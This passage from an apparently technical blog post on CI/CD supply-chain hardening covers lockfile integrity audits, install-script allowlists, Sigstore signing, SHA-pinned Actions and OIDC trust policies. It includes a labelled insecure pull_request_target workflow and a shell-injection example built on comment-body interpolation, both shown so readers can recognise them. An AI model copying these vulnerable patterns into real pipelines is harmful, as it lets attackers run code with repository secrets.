&lt;span class="c"&gt;# Fails if the lockfile contains any off-registry tarball not on this allowlist.&lt;/span&gt;
&lt;span class="nv"&gt;EXPECTED_TARBALLS&lt;/span&gt;&lt;span class="o"&gt;=(&lt;/span&gt;
  &lt;span class="s2"&gt;"https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz"&lt;/span&gt;  &lt;span class="c"&gt;# SheetJS withdrew xlsx from npm in 2023&lt;/span&gt;
&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
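
&lt;p&gt;The missing-&lt;code&gt;integrity:&lt;/code&gt; audit itself can be sketched in a few lines. This assumes pnpm's layout where &lt;code&gt;integrity:&lt;/code&gt; directly follows &lt;code&gt;tarball:&lt;/code&gt; in a resolution block; a production version would parse the YAML properly with &lt;code&gt;yq&lt;/code&gt;:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Sample input: one healthy entry, one trust-the-CDN entry.
printf '%s\n' \
  '  resolution:' \
  '    tarball: https://registry.npmjs.org/ok/-/ok-1.0.0.tgz' \
  '    integrity: sha512-deadbeef' \
  '  resolution:' \
  '    tarball: https://cdn.somehost.com/foo.tgz' \
  | awk '
      /tarball:/ { url = $2; pending = 1; next }
      pending    { if ($1 != "integrity:") print "MISSING INTEGRITY: " url; pending = 0 }
      END        { if (pending) print "MISSING INTEGRITY: " url }
    '
# prints: MISSING INTEGRITY: https://cdn.somehost.com/foo.tgz
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;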



&lt;p&gt;In retrospect, the same lockfile scrutiny would have flagged the &lt;code&gt;axios@1.14.1&lt;/code&gt; situation early: a brand-new transitive (&lt;code&gt;plain-crypto-js@4.2.1&lt;/code&gt;) appeared in the lockfile diff. A mandatory PR-time review of lockfile additions catches what the eye doesn't.&lt;/p&gt;

&lt;p&gt;The general invariant translates: pip's &lt;code&gt;--require-hashes&lt;/code&gt;, Cargo's checksum field, Maven's &lt;code&gt;--strict-checksums&lt;/code&gt;, NuGet package signing, Go's module sum database. Every modern package manager has the primitive. The discipline is auditing for entries where it isn't enforced.&lt;/p&gt;
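
&lt;p&gt;For pip, the same invariant looks like this (the hash value below is a placeholder, not a real digest):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# requirements.txt, installed with: pip install --require-hashes -r requirements.txt
# pip then rejects any artifact whose digest doesn't match.
requests==2.32.3 \
    --hash=sha256:0123abcd...placeholder...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;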

&lt;h4&gt;
  
  
  Boundary 4: Install → Lifecycle scripts (What runs on install?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; malicious lifecycle hooks. The axios attack's payload ran here. &lt;code&gt;plain-crypto-js@4.2.1&lt;/code&gt;'s entire malicious behaviour was a &lt;code&gt;postinstall: node setup.js&lt;/code&gt;. Without that hook, the package would have sat on disk doing nothing until something &lt;code&gt;require()&lt;/code&gt;'d it, and &lt;code&gt;axios&lt;/code&gt; doesn't import &lt;code&gt;plain-crypto-js&lt;/code&gt;. The postinstall was the only thing that turned a passive disk write into RCE during install.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Default-deny on install scripts&lt;/strong&gt;, allowlist of who may run them:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="w"&gt;   &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
     &lt;/span&gt;&lt;span class="nl"&gt;"pnpm"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
       &lt;/span&gt;&lt;span class="nl"&gt;"onlyBuiltDependencies"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"esbuild"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"@swc/core"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"@datadog/native-iast-taint-tracking"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"prisma"&lt;/span&gt;&lt;span class="w"&gt;
       &lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
     &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
   &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;plain-crypto-js&lt;/code&gt; would not have been on any team's allowlist. &lt;code&gt;pnpm install --ignore-scripts&lt;/code&gt; (read-only CI workflows) and &lt;code&gt;onlyBuiltDependencies&lt;/code&gt; (pnpm 10) each, independently, neutralise the postinstall vector.&lt;/p&gt;

&lt;ol start="2"&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Behavioural quarantine.&lt;/strong&gt; &lt;code&gt;Socket&lt;/code&gt; and &lt;code&gt;Phylum&lt;/code&gt; analyse new transitives for suspicious patterns (network calls, file-system access, dynamic eval) before they reach your lockfile. &lt;code&gt;npq&lt;/code&gt; wraps &lt;code&gt;npm install&lt;/code&gt; to prompt before installing freshly published packages. None of these would catch a sufficiently subtle payload, but &lt;code&gt;plain-crypto-js&lt;/code&gt;'s &lt;code&gt;node setup.js&lt;/code&gt; → C2 download is exactly the shape they flag.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Build-host sandboxing.&lt;/strong&gt; Run installs inside an ephemeral container with no network egress except to the registry; or use Bubblewrap / Firejail / Chainguard's hardened images. Defence-in-depth for the case where the lifecycle gate fails open.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;The limit:&lt;/strong&gt; lifecycle gates block &lt;code&gt;preinstall&lt;/code&gt; / &lt;code&gt;install&lt;/code&gt; / &lt;code&gt;postinstall&lt;/code&gt;. They do not prevent module-load-time top-level execution when an attacker-controlled package gets &lt;code&gt;require()&lt;/code&gt;'d or &lt;code&gt;import&lt;/code&gt;'d during &lt;code&gt;vitest&lt;/code&gt;, &lt;code&gt;tsc&lt;/code&gt;, &lt;code&gt;eslint&lt;/code&gt;, or any other tool that imports your code graph. The &lt;code&gt;minimumReleaseAge&lt;/code&gt; cooldown (Boundary 2) is the layer behind that.&lt;/p&gt;

&lt;p&gt;Stack equivalents: pip's risky surface is &lt;code&gt;setup.py&lt;/code&gt; install hooks (mitigate with &lt;code&gt;--only-binary=:all:&lt;/code&gt;); Ruby's is &lt;code&gt;gem install&lt;/code&gt; running &lt;code&gt;extconf.rb&lt;/code&gt;; Cargo's is &lt;code&gt;build.rs&lt;/code&gt; (sandbox via Bazel &lt;code&gt;rules_rust&lt;/code&gt; or &lt;code&gt;cargo-deny&lt;/code&gt; bans); .NET's modern PackageReference does not run scripts (legacy &lt;code&gt;packages.config&lt;/code&gt; does); Maven's and Gradle's are build plugins (audit &lt;code&gt;&amp;lt;build&amp;gt;&amp;lt;plugins&amp;gt;&lt;/code&gt; and &lt;code&gt;buildscript { dependencies }&lt;/code&gt;).&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 2. Build-side: what runs during your build
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Boundary 5: Source → Image (Is our build environment trustworthy?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; base image tag rewrite, secrets baked into image layers.&lt;br&gt;
&lt;strong&gt;Controls:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Pin every &lt;code&gt;FROM&lt;/code&gt; by &lt;code&gt;@sha256:&amp;lt;digest&amp;gt;&lt;/code&gt;.&lt;/strong&gt; Tags are mutable; digests are content-addressed (if the bytes change, the digest no longer matches and the pull fails, so a tag rewrite can't reach you).
&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;   FROM node:20.11.1-alpine3.19@sha256:735dd688da64d22ebd9... AS base
   USER node
   CMD ["node", "dist/main.js"]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;ol start="2"&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Drop privileges with &lt;code&gt;USER&lt;/code&gt; before &lt;code&gt;CMD&lt;/code&gt;.&lt;/strong&gt; For Node images: &lt;code&gt;USER node&lt;/code&gt;. For nginx: switch to &lt;code&gt;nginxinc/nginx-unprivileged&lt;/code&gt; (drop-in non-root replacement listening on 8080).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Never put secrets in &lt;code&gt;ARG&lt;/code&gt; defaults&lt;/strong&gt;: they persist in &lt;code&gt;docker history&lt;/code&gt;. Use BuildKit &lt;code&gt;--mount=type=secret&lt;/code&gt; for build-time secrets.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Hermetic builds for the highest tier.&lt;/strong&gt; Bazel &lt;code&gt;rules_oci&lt;/code&gt;, Nix &lt;code&gt;dockerTools&lt;/code&gt;, Chainguard's &lt;code&gt;apko&lt;/code&gt; + &lt;code&gt;melange&lt;/code&gt; produce reproducible images where every byte is content-addressed back to source. Overkill for most teams; required for SLSA L3+.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
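&lt;p&gt;A sketch of the &lt;code&gt;--mount=type=secret&lt;/code&gt; pattern (the secret id and the &lt;code&gt;.npmrc&lt;/code&gt; line are placeholders; digest pin elided for brevity): the token is readable only during that &lt;code&gt;RUN&lt;/code&gt; and never lands in a layer or in &lt;code&gt;docker history&lt;/code&gt;:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;# syntax=docker/dockerfile:1
# Build with: docker build --secret id=npm_token,env=NPM_TOKEN .
# .npmrc in the repo reads: //registry.npmjs.org/:_authToken=${NPM_TOKEN}
FROM node:20.11.1-alpine3.19 AS deps
RUN --mount=type=secret,id=npm_token \
    NPM_TOKEN="$(cat /run/secrets/npm_token)" pnpm install --frozen-lockfile
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;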
&lt;h4&gt;
  
  
  Boundary 6: Image → Registry (Can downstream verify what we shipped?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; image tag rewrite at the registry; image swap; "did we actually ship this build?" forensics gap.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; &lt;strong&gt;cosign keyless signing via Sigstore.&lt;/strong&gt; Sigstore is a free signing service; &lt;strong&gt;Fulcio&lt;/strong&gt; is its short-lived certificate authority; &lt;strong&gt;Rekor&lt;/strong&gt; is its public transparency log; the &lt;strong&gt;SET&lt;/strong&gt; (Signed Entry Timestamp) is Rekor's tamper-proof timestamp binding the signature to a moment when the cert was still valid. GitHub Actions OIDC issues a short-lived signing identity, Fulcio mints a certificate valid for ~10 minutes, and the signature is recorded in Rekor.&lt;/p&gt;

&lt;p&gt;Treat Rekor as load-bearing, not optional. The Fulcio cert expires almost immediately; what makes a keyless signature verifiable hours or years later is the Rekor inclusion proof. A &lt;code&gt;cosign verify&lt;/code&gt; that doesn't check the SET is meaningless after cert expiry.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Verify with workflow-path anchoring&lt;/strong&gt;, not a loose org regex:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cosign verify &amp;lt;image&amp;gt;@&amp;lt;digest&amp;gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-identity-regexp&lt;/span&gt; &lt;span class="s2"&gt;"^https://github&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;com/yourorg/yourrepo/&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;github/workflows/release&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;yml@refs/heads/main$"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-oidc-issuer&lt;/span&gt; &lt;span class="s2"&gt;"https://token.actions.githubusercontent.com"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-github-workflow-repository&lt;/span&gt; &lt;span class="s2"&gt;"yourorg/yourrepo"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-github-workflow-ref&lt;/span&gt; &lt;span class="s2"&gt;"refs/heads/main"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;An open &lt;code&gt;^https://github.com/yourorg/&lt;/code&gt; regex matches any workflow under the org, including a malicious workflow added in a fork and run via &lt;code&gt;pull_request_target&lt;/code&gt;. Anchor on the workflow path, the ref, AND test the regex with a known-different workflow before relying on it. Unanchored regexes (missing &lt;code&gt;^&lt;/code&gt; or &lt;code&gt;$&lt;/code&gt;) match more workflows than you intended.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Signing alone does not satisfy SLSA&lt;/strong&gt; (Supply-chain Levels for Software Artifacts, a framework grading build provenance trustworthiness). The signature proves &lt;em&gt;who&lt;/em&gt; built the image, not &lt;em&gt;how&lt;/em&gt;. SLSA Build L3 requires provenance attestations in &lt;code&gt;in-toto&lt;/code&gt; format (&lt;code&gt;https://slsa.dev/provenance/v1&lt;/code&gt; predicate), produced by &lt;code&gt;cosign attest --predicate&lt;/code&gt; from a hardened, isolated builder such as &lt;code&gt;slsa-github-generator&lt;/code&gt;. Verify with &lt;code&gt;cosign verify-attestation&lt;/code&gt;. The signature is the foundation. The attestation chain is the rest of the building.&lt;/p&gt;
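
&lt;p&gt;A sketch of wiring the hardened builder in (the tag and inputs follow the generator's container workflow; check its README for exactly what your registry needs):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;jobs:
  provenance:
    needs: build
    permissions:
      actions: read      # read workflow metadata for the provenance
      id-token: write    # sign via Sigstore keyless
      packages: write    # push the attestation next to the image
    uses: slsa-framework/slsa-github-generator/.github/workflows/generator_container_slsa3.yml@v2.0.0
    with:
      image: ghcr.io/yourorg/yourrepo
      digest: ${{ needs.build.outputs.digest }}
    secrets:
      registry-username: ${{ github.actor }}
      registry-password: ${{ secrets.GITHUB_TOKEN }}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;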

&lt;p&gt;&lt;strong&gt;A signature you don't verify at deploy time is theatre.&lt;/strong&gt; Wire &lt;code&gt;cosign verify&lt;/code&gt; into a Kubernetes admission controller (&lt;strong&gt;Kyverno&lt;/strong&gt; &lt;code&gt;verifyImages&lt;/code&gt;, &lt;strong&gt;Connaisseur&lt;/strong&gt;, or &lt;strong&gt;Sigstore policy-controller&lt;/strong&gt;) so the cluster refuses to schedule unsigned or wrong-identity images. GitHub's native &lt;code&gt;gh attestation verify&lt;/code&gt; (GA 2024) is the simplest verification entry-point if you're not on Kubernetes.&lt;/p&gt;
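
&lt;p&gt;A minimal Kyverno sketch (image pattern and workflow identity are placeholders) that refuses unsigned or wrong-identity images at admission:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: require-signed-images
spec:
  validationFailureAction: Enforce
  rules:
    - name: verify-release-signature
      match:
        any:
          - resources:
              kinds: [Pod]
      verifyImages:
        - imageReferences: ["ghcr.io/yourorg/*"]
          attestors:
            - entries:
                - keyless:
                    subject: "https://github.com/yourorg/yourrepo/.github/workflows/release.yml@refs/heads/main"
                    issuer: "https://token.actions.githubusercontent.com"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;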

&lt;p&gt;Stack-agnostic: cosign works on any container image registry (ECR, GHCR, ACR, GAR, Harbor, Artifactory, Quay) and on generic blobs via &lt;code&gt;cosign sign-blob&lt;/code&gt;. Sigstore Fulcio currently trusts OIDC issuers from GitHub, GitLab, Buildkite, CircleCI, Google, Microsoft. Same &lt;code&gt;cosign sign --identity-token&lt;/code&gt; flow, different &lt;code&gt;iss&lt;/code&gt; claim. PEP 740 attestations + &lt;code&gt;python -m sigstore&lt;/code&gt; cover Python wheels; &lt;code&gt;sigstore-maven-plugin&lt;/code&gt; covers Java JARs.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 7: Tag → Commit (What does this &lt;code&gt;uses:&lt;/code&gt; / include / plugin actually point to?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;This is the boundary tj-actions exploited.&lt;/strong&gt; A line like &lt;code&gt;uses: tj-actions/changed-files@v45&lt;/code&gt; resolves at build time to whatever commit the &lt;code&gt;v45&lt;/code&gt; tag currently references. Tags are mutable. Commit SHAs are not.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; pin every external &lt;code&gt;uses:&lt;/code&gt; to a 40-character commit SHA with a tag comment.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd&lt;/span&gt; &lt;span class="c1"&gt;# v6&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;pulumi/actions@8582a9e8cc630786854029b4e09281acd6794b58&lt;/span&gt; &lt;span class="c1"&gt;# v6&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Enforce in CI with &lt;code&gt;pinact run --check --verify&lt;/code&gt;. It fails the PR if anything is unpinned, and flags drift between the pinned SHA and the SHA the upstream tag currently resolves to. It catches inadvertent drift. It does not by itself defeat a tag-rewrite attack. &lt;code&gt;pinact&lt;/code&gt; will surface the mismatch but cannot tell you which side is hostile. Pair it with a higher-trust signal: Sigstore attestation verification, GitHub's &lt;code&gt;gh attestation verify&lt;/code&gt; for Action artifacts (GA 2024), &lt;code&gt;StepSecurity Harden-Runner&lt;/code&gt; for egress-policy + tampering detection on the runner, or human review of any flagged drift.&lt;/p&gt;

&lt;p&gt;When we started, none of our 110 &lt;code&gt;uses:&lt;/code&gt; lines were SHA-pinned. That included &lt;code&gt;pulumi/actions&lt;/code&gt; (cloud-deploy authority), &lt;code&gt;lasith-kg/dispatch-workflow&lt;/code&gt; (single maintainer), &lt;code&gt;aws-actions/configure-aws-credentials&lt;/code&gt; (×11), and &lt;code&gt;docker/build-push-action&lt;/code&gt; (×3, ECR push). They all are now, with a CI gate so they stay that way.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Translate to your CI:&lt;/strong&gt; GitLab &lt;code&gt;include:&lt;/code&gt; should pin &lt;code&gt;ref:&lt;/code&gt; to a SHA, not &lt;code&gt;main&lt;/code&gt;. Buildkite plugins should pin &lt;code&gt;plugin@&amp;lt;sha&amp;gt;&lt;/code&gt;, not &lt;code&gt;@v1&lt;/code&gt;. CircleCI orbs are best inlined or vendored. Jenkins shared libraries should pin &lt;code&gt;@Library('foo@&amp;lt;sha&amp;gt;')&lt;/code&gt;. Bazel modules pin via &lt;code&gt;MODULE.bazel.lock&lt;/code&gt;. The control: no mutable references to third-party code anywhere in CI config.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 8: Workflow → Secrets (What can a single compromised step exfiltrate?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; any step in a workflow inherits the workflow's permissions and any environment-scoped secrets. A compromised Action running with &lt;code&gt;permissions: write-all&lt;/code&gt; receives a &lt;code&gt;GITHUB_TOKEN&lt;/code&gt; with write scopes across that repository's API surface (contents, issues, pull requests, packages, deployments) for the duration of that workflow run.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; default-deny at workflow level, grant per-job:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;permissions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{}&lt;/span&gt;

&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;permissions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;contents&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;read&lt;/span&gt;       &lt;span class="c1"&gt;# for checkout&lt;/span&gt;
      &lt;span class="na"&gt;id-token&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;write&lt;/span&gt;      &lt;span class="c1"&gt;# for AWS OIDC&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;zizmor&lt;/code&gt; (free workflow-security linter) audits this on every PR. When we ran it the first time, 8 of our 16 workflows were running &lt;code&gt;permissions: write-all&lt;/code&gt;. Today none of them do.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reusable workflows (&lt;code&gt;workflow_call&lt;/code&gt;)&lt;/strong&gt; inherit the caller's &lt;code&gt;permissions:&lt;/code&gt; unless explicitly overridden. &lt;code&gt;secrets: inherit&lt;/code&gt; on the caller hands every repository secret to the callee. Pass secrets explicitly by name and re-declare &lt;code&gt;permissions:&lt;/code&gt; in every reusable workflow.&lt;/p&gt;
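
&lt;p&gt;The explicit form costs only a few lines more than &lt;code&gt;secrets: inherit&lt;/code&gt; (the workflow path and secret name here are hypothetical):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;jobs:
  deploy:
    permissions:
      contents: read
      id-token: write
    uses: ./.github/workflows/deploy-reusable.yml
    with:
      environment: production
    secrets:
      DEPLOY_WEBHOOK_URL: ${{ secrets.DEPLOY_WEBHOOK_URL }}   # named, nothing else crosses
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;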

&lt;p&gt;&lt;strong&gt;&lt;code&gt;pull_request_target&lt;/code&gt; is the single highest-severity GitHub Actions footgun.&lt;/strong&gt; Unlike &lt;code&gt;pull_request&lt;/code&gt;, it runs in the context of the base repository with the base repo's &lt;code&gt;GITHUB_TOKEN&lt;/code&gt; and access to repository secrets. If you &lt;code&gt;actions/checkout&lt;/code&gt; the PR head, you've executed an attacker's code with privileged credentials. Default rule: never check out PR head code in a &lt;code&gt;pull_request_target&lt;/code&gt; workflow; never run third-party scripts inside one.&lt;/p&gt;
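
&lt;p&gt;The anti-pattern in one block, so it's recognisable in review:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;# DO NOT ship this: privileged context + attacker-controlled code.
on: pull_request_target        # base-repo GITHUB_TOKEN, repo secrets in scope
jobs:
  lint:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}   # attacker's commit
      - run: npm ci &amp;&amp; npm run lint                    # executes it with privileges
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;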

&lt;p&gt;&lt;strong&gt;Replace long-lived AWS keys with GitHub OIDC.&lt;/strong&gt; The role's trust policy restricts assumption to your repository's workflows; CI never holds a credential that survives the run. The footgun: a &lt;code&gt;sub&lt;/code&gt; condition like &lt;code&gt;repo:org/*:*&lt;/code&gt; hands AWS-role assumption to any workflow run from any branch, including a fork's PR. Anchor &lt;code&gt;sub&lt;/code&gt; to a specific repo + ref:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="nl"&gt;"Condition"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"StringEquals"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"token.actions.githubusercontent.com:aud"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sts.amazonaws.com"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"StringLike"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"token.actions.githubusercontent.com:sub"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"repo:yourorg/yourrepo:ref:refs/heads/main"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Note that anchoring to &lt;code&gt;refs/heads/main&lt;/code&gt; still lets &lt;em&gt;any&lt;/em&gt; push to &lt;code&gt;main&lt;/code&gt; assume the role: fine for a build-and-test role, too permissive for a production-deploy role. For deploy roles, anchor to a tag pattern (&lt;code&gt;ref:refs/tags/v*&lt;/code&gt;) or to a GitHub Environment with required reviewers. For higher precision than &lt;code&gt;sub&lt;/code&gt;, use &lt;code&gt;job_workflow_ref&lt;/code&gt;. It constrains to a specific leaf workflow file and is resilient to a malicious reusable-workflow caller inside the same repo. AWS, GCP Workload Identity Federation, and Azure federated credentials all expose it.&lt;/p&gt;
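
&lt;p&gt;A sketch of the tighter trust-policy condition (repo, workflow path, and tag pattern are placeholders):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;"Condition": {
  "StringEquals": {
    "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
  },
  "StringLike": {
    "token.actions.githubusercontent.com:job_workflow_ref": "yourorg/yourrepo/.github/workflows/deploy.yml@refs/tags/v*"
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;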

&lt;p&gt;CI translations: GitLab CI uses &lt;code&gt;id_tokens:&lt;/code&gt; per-job and CI/CD job-token scope allowlists; Buildkite uses agent-queue ACLs and Vault Agent for secret distribution; CircleCI uses restricted contexts; Jenkins uses &lt;code&gt;withCredentials&lt;/code&gt; per-step plus folder-level credential isolation. Different YAML, same default-deny pattern.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 9: Untrusted input → Shell (CWE-78 in CI)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; GitHub-context fields like &lt;code&gt;github.event.comment.body&lt;/code&gt;, &lt;code&gt;pull_request.title&lt;/code&gt;, &lt;code&gt;head_ref&lt;/code&gt; are attacker-controlled. When interpolated directly into a &lt;code&gt;run:&lt;/code&gt; block, they become shell injection. The same class exists everywhere: GitLab &lt;code&gt;$CI_*&lt;/code&gt; from triggered events, Jenkins parameterised builds, Buildkite &lt;code&gt;meta-data&lt;/code&gt;, Azure &lt;code&gt;variables&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Unsafe:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;echo "Reviewing&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ github.event.comment.body }}"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



